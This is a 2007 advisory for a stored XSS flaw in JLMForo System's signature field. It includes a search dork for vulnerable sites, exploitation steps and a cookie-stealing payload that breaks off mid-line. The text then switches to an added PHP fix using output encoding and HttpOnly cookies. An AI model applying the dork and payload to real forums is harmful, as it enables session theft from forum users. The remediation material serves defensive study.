jlmforo-xss.txt
Posted on 27 November 2007
# JLMForo System (modificarPerfil.php) Cross-Site Scripting Vulnerability
# Download:
# http://www.miscodigos.com/aplicaciones/JLMForo%20System/
# Bug found by Jose Luis Góngora Fernández / JosS
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
# /server irc.freenode.net /join #fullsecure
# d0rk: "Powered By JLMForo System"
# Stop lammer

# Basic explanation:
1.- Register in the forum (registro.php)
2.- Put the XSS in your signature (modificarPerfil.php)
3.- Create a subject
4.- Wait for an answer to see the XSS

# To steal cookies:
1º- Register in the forum (registro.php)
2º- Put the XSS in your signature (modificarPerfil.php): <script>window.location=
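
The advisory describes a stored XSS: the signature saved through modificarPerfil.php is written into thread pages unencoded. The following is an added example, not JLMForo code and not from the advisory's author, showing output encoding for a signature field and a session cookie that script cannot read; the function names, the 500-character limit, the HTTPS assumption and the sample signature are assumptions.

```php
<?php
// Added example, not JLMForo code. Function names, the 500-character limit
// and the sample signature are assumptions made for illustration.
// Requires PHP 7.3+ (array form of session_set_cookie_params) and mbstring.

// Call before session_start(): HttpOnly keeps the session cookie out of
// document.cookie, so a script injected in a signature cannot read it.
function harden_session_cookie(): void
{
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => true,      // assumes the forum is served over HTTPS
        'samesite' => 'Lax',
    ]);
}

// Input side (profile update): bound the stored value, keep it as plain text.
function normalize_signature(string $raw, int $maxChars = 500): string
{
    $raw = str_replace("\0", '', $raw);
    return mb_substr(trim($raw), 0, $maxChars, 'UTF-8');
}

// Output side (thread view): encode at the point where the signature is
// written into HTML, so markup typed by a user is displayed, not executed.
function render_signature(string $stored): string
{
    $safe = htmlspecialchars($stored, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div class="signature">' . nl2br($safe, false) . '</div>';
}

// Constructed sample: a signature that contains markup.
$stored = normalize_signature("JosS\n<script>alert(1)</script>");
echo render_signature($stored), "\n";
```

Encoding belongs on every page that prints the signature, not only on the profile form, because the value is stored once and rendered to each visitor of the thread.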